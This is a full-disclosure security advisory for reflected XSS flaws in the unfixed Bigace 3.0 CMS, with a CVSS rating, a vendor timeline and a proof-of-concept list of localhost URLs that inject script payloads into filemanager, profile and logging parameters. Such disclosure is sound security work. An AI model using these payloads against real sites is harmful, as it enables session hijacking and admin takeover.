1. Introduction
Affected Product: | Bigace 3.0 |
Fixed in: | not fixed |
Fixed Version Link: | n/a |
Vendor Website: | http://www.bigace.de/ |
Vulnerability Type: | XSS |
Remote Exploitable: | Yes |
Reported to vendor: | 11/17/2015 |
Disclosed to public: | 01/28/2016 |
Release mode: | Full Disclosure |
CVE: | requested, but not assigned |
Credits | Tim Coen of curesec GmbH |
2. Overview
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
Bigace is a CMS written in PHP. In version 3.0, there are various reflected XSS vulnerabilities. This can lead to the injection of JavaScript keyloggers, or the bypassing of CSRF protection. In this case, this may lead to code execution via a file uploader in the admin area.
3. Proof of Concept
http://localhost/bigace_3.0/public/index.php/filemanager/upload/index/?itemtype=4&language="><script>alert(1)</script> http://localhost/bigace_3.0/public/index.php/filemanager/categories/index/?itemtype=4&language="><script>alert(1)</script> http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&additional=CKEditor|CKEditorFuncNum&CKEditor=editorContent";}alert(1);function foo(){var foo=" http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&additional=CKEditor|CKEditorFuncNum&CKEditorFuncNum=";}alert(1);function foo(){var foo=" http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&jsfunction=SetUrl|url';}alert(1);function foo(){var foo=' http://localhost/bigace_3.0/public/index.php/filemanager/index/index/?id=-1&jsfunction=SetUrl</script><img src=no onerror=alert(1)>|url http://localhost/bigace_3.0/public/index.php/admin/profile/index/%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e http://localhost/bigace_3.0/public/index.php/admin/logging/index/en?start=1&amount=20&namespace=system&level="><script>alert(1)</script>&showLogs=Show http://localhost/bigace_3.0/public/index.php/admin/logging/index/en?start="><script>alert(1)</script>&amount=20&namespace=system&level=1&showLogs=Show
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
11/17/2015 | Informed Vendor about Issue (no reply) |
12/10/2015 | CVE Requested, but not assigned |
12/10/2015 | Reminded Vendor of Disclosure Date |
12/14/2015 | Vendor requests more time |
01/10/2015 | Reminded Vendor of Disclosure Date |
01/17/2015 | Vendor discontinued project |
01/28/2016 | Disclosed to public |